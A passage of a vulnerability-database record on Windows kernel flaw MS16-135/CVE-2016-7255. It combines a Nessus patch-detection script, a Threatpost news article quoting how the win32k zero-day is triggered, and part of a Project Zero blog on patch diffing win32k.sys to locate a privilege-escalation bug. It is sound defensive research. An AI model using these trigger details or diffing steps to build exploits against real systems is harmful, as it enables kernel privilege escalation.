(CVE-2016-7218)", "edition": 35, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-08T00:00:00", "title": "MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-135.NASL", "href": "https://www.tenable.com/plugins/nessus/94636", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94636);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:32\");\n\n script_cve_id(\n \"CVE-2016-7214\",\n \"CVE-2016-7215\",\n \"CVE-2016-7218\",\n \"CVE-2016-7246\",\n \"CVE-2016-7255\"\n );\n script_bugtraq_id(\n 93991,\n 94000,\n 94004,\n 94063,\n 94064\n );\n script_xref(name:\"MSFT\", value:\"MS16-135\");\n script_xref(name:\"MSKB\", value:\"3198234\");\n script_xref(name:\"MSKB\", value:\"3194371\");\n script_xref(name:\"MSKB\", value:\"3197867\");\n script_xref(name:\"MSKB\", value:\"3197868\");\n script_xref(name:\"MSKB\", value:\"3197873\");\n script_xref(name:\"MSKB\", value:\"3197874\");\n script_xref(name:\"MSKB\", value:\"3197876\");\n script_xref(name:\"MSKB\", value:\"3197877\");\n script_xref(name:\"MSKB\", value:\"3198585\");\n script_xref(name:\"MSKB\", value:\"3198586\");\n script_xref(name:\"MSKB\", value:\"3200970\");\n script_xref(name:\"IAVA\", value:\"2016-A-0322\");\n\n script_name(english:\"MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)\");\n script_summary(english:\"Checks the version of ntoskrnl.exe or the installed rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. 
It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. (CVE-2016-7218)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-135\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-135';\nkbs = make_list(\n '3198234',\n '3194371',\n '3197867',\n '3197868',\n '3197873',\n '3197874',\n '3197876',\n '3197877',\n '3198585',\n '3198586',\n '3200970'\n\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, 
exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24029\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19706\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.24021\", min_version:\"6.0.6002.23000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.19698\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n # 8.1 / 2012 R2\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197873, 3197874)) ||\n # 2012\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197876, 3197877)) ||\n # 7 / 2008 R2\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197867, 3197868)) ||\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198585)) ||\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198586)) ||\n # 10 (1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3200970))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:27", "bulletinFamily": "info", "cvelist": ["CVE-2016-7199", "CVE-2016-7209", "CVE-2016-7214", "CVE-2016-7215", "CVE-2016-7218", "CVE-2016-7246", "CVE-2016-7255"], "description": "Microsoft followed through and today patched a zero-day vulnerability being exploited in public attacks that was [disclosed by Google researchers](<https://threatpost.com/google-reveals-windows-kernel-zero-day-under-attack/121689/>) nine days ago.\n\nThe victims have yet to be identified, but [Microsoft did accuse the Sofacy APT gang](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of carrying out the attacks. Sofacy is generally thought to have ties to Russian military intelligence and its targets are strategic, such as government and diplomatic agencies, military and defense contractors, and public policy think-tanks.\n\nGoogle\u2019s disclosure on Oct. 31 came 10 days after it privately reported the vulnerability to Microsoft, along with a Flash zero day to Adobe also used in these attacks.\n\nAdobe patched the Flash vulnerability with an [emergency update](<https://threatpost.com/adobe-patches-flash-zero-day-under-attack/121567/>) released on Oct. 26, but Microsoft failed to publicly acknowledge the bug until only after Google publicly disclosed it. 
Google\u2019s internal policy gives vendors seven days to publicly report or patch vulnerabilities being actively exploited.\n\nGoogle said the vulnerability is a local privilege escalation in the Windows kernel that leads to a sandbox escape.\n\n\u201cIt can be triggered via the win32k.sys system call NtSetWindowLongPtr() for the index GWLP_ID on a window handle with GWL_STYLE set to WS_CHILD,\u201d Google\u2019s Neel Mehta and Billy Leonard said in their [disclosure](<https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html>).\n\nThe attackers chained this bug and the Flash zero day in order to get on targeted computers. The sandbox escape allows the attacker to run code in kernel mode.\n\n\u201cMicrosoft implemented new exploit mitigations in the Windows 10 Anniversary Update version of the win32k kernel component,\u201d Microsoft said in its bulletin, [MS16-135](<https://technet.microsoft.com/library/security/MS16-135>). \u201cThese Windows 10 Anniversary Update mitigations, which were developed based on proactive internal research, stop all observed in-the-wild instances of this exploit.\u201d\n\nMS16-135 also patched two other elevation of privilege vulnerabilities in the Windows kernel (CVE-2016-7215 and CVE-2016-7246), as well as an information disclosure bug in the kernel that opens the door for a kernel ASLR bypass (CVE-2016-7214), and a separate information disclosure bug in the Windows bowser.sys kernel-mode driver (CVE-2016-7218).\n\nSix of the 14 bulletins put out by Microsoft today are rated critical. One, [MS16-132](<https://technet.microsoft.com/library/security/MS16-132>), included another vulnerability under attack in the Windows Graphics Component. 
Microsoft said a remote code execution Open Type Font vulnerability was patched in the Windows font library.\n\nThat bulletin patched three other flaws, including an information disclosure flaw in Open Type Font, specifically in the ATMFD component, which leaks enough information to carry out a further compromise. Also addressed were remote code execution memory corruption vulnerabilities in Windows Animation Manager and Windows Media Foundation.\n\nMicrosoft also provided cumulative updates for its browsers, Edge and Internet Explorer. The Edge update, [MS16-129](<https://technet.microsoft.com/library/security/MS16-129>), patched 17 vulnerabilities, most of which lead to remote code execution. Two of the flaws, CVE-2016-7209 and CVE-2016-7199, were publicly disclosed, Microsoft said, but not used in in-the-wild attacks. The second disclosed bug was also patched in the Internet Explorer update, [MS16-142](<https://technet.microsoft.com/library/security/MS16-142>), which patched seven CVEs.\n\n[MS16-130](<https://technet.microsoft.com/library/security/MS16-130>) patched three critical Windows bugs, a remote code execution flaw in the way Windows\u2019 image file loading handles malformed image files, along with two elevation of privilege flaws in Windows IME and Windows Task Scheduler.\n\nAnother remote code execution vulnerability was addressed in [MS16-131](<https://technet.microsoft.com/library/security/MS16-131>) in the Microsoft Video Control component. 
The remaining critical bulletin is the Adobe Flash Player update for IE and Edge; Adobe released an update today for Flash Player patching [nine remote code execution flaws](<https://threatpost.com/adobe-patches-nine-code-execution-flaws-in-flash-player/121839/>) in the software.\n\nThough rated important by Microsoft, an Office bulletin, [MS16-133](<https://technet.microsoft.com/library/security/MS16-133>), also merits attention because it patches a dozen vulnerabilities including 10 that lead to remote code execution. None of the Office bugs are being publicly attacked, Microsoft said.\n\nMicrosoft also patched SQL Server, addressing a half-dozen elevation of privilege and information disclosure vulnerabilities in [MS16-136](<https://technet.microsoft.com/library/security/MS16-136>). Three of the EoP bugs are in the SQL Server RDBMS engine, along with a cross-site scripting flaw in SQL Server MDS, an information disclosure issue in SQL Analysis Services, and another EoP issue in the SQL Server Engine Server Agent.\n\n\u201cThe top priority for most administrators will be to quickly deploy fixes for browsers, graphics components, and Office. All of these components are affected by one or more code execution vulnerabilities Microsoft has classified as highly exploitable,\u201d said Craig Young, security researcher at Tripwire. 
\u201cThese are of the highest priority due to the fact that the vulnerabilities can potentially be triggered through normal web browsing activities giving an external attacker a way into networks.\u201d\n\nThe remaining bulletins are also rated important:\n\n * [MS16-134](<https://technet.microsoft.com/library/security/MS16-134>) patches 10 elevation of privilege flaws in the Windows Common Log File System (CLFS)\n * [MS16-137](<https://technet.microsoft.com/library/security/MS16-137>) patches three vulnerabilities in Windows NTLM, Virtual Secure Mode and Local Security Authority Subsystem Service\n * [MS16-138](<https://technet.microsoft.com/library/security/MS16-138>) patches four elevation of privilege vulnerabilities in the Windows Virtual Hard Disk Driver\n * [MS16-139](<https://technet.microsoft.com/library/security/MS16-139>) patches a local Windows kernel elevation of privilege flaw in how the Windows Kernel API enforces permissions\n * [MS16-140](<https://technet.microsoft.com/library/security/MS16-140>) patches a security feature bypass in the Windows Secure Boot component; an attacker could disable code integrity checks and allow test-signed executables and drivers to be loaded.\n", "modified": "2016-11-08T20:23:12", "published": "2016-11-08T14:57:26", "id": "THREATPOST:F10810414F1898BE0159A069C1B719B2", "href": "https://threatpost.com/microsoft-patches-zero-day-disclosed-by-google/121851/", "type": "threatpost", "title": "Microsoft Patches Zero Day Disclosed by Google", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can 
learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). \n\n** \n**\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\n** \n**\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\n** \n**\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. 
It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\n** \n**\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\n** \n**\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. 
This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\n** \n**\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. 
On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\n** \n**\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\n** \n**\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\n** \n**\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. 
These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\nOn James Forshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\nNow that I had a copy of the supposedly patched and supposedly vulnerable versions of win32k.sys, it was time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison of the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. 
(Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n \n\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\n \n\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\n** \n**\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\n \n\n\nBinDiff Matched Function of win32k.sys with Symbols\n\n** \n**\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. 
Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the BinDiff image above. In the Dec 2019 win32k.sys its offset from the base address is 0x22F200.\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 version added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and it appears that there would be a way to overrun a buffer.\n\nI decided to keep reversing and spent a few days on this change. 
I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\n \n\n\n** \n**\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\n** \n**\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\n** \n**\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. 
I set a kernel breakpoint in WinDbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that led to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n## REVERSING THE VULNERABILITY\n\nI had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. 
While it didn\u2019t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.\n\n** \n**\n\nFor example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground \u2192 global, pointer to queue (tagQ *), gptiCurrent \u2192 global, pointer to thread info (tagTHREADINFO *).\n\n** \n**\n\nThis was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it\u2019s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.\n\n** \n**\n\nAt this point, I was pretty sure I had found the vulnerability (\ud83d\ude09), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. 
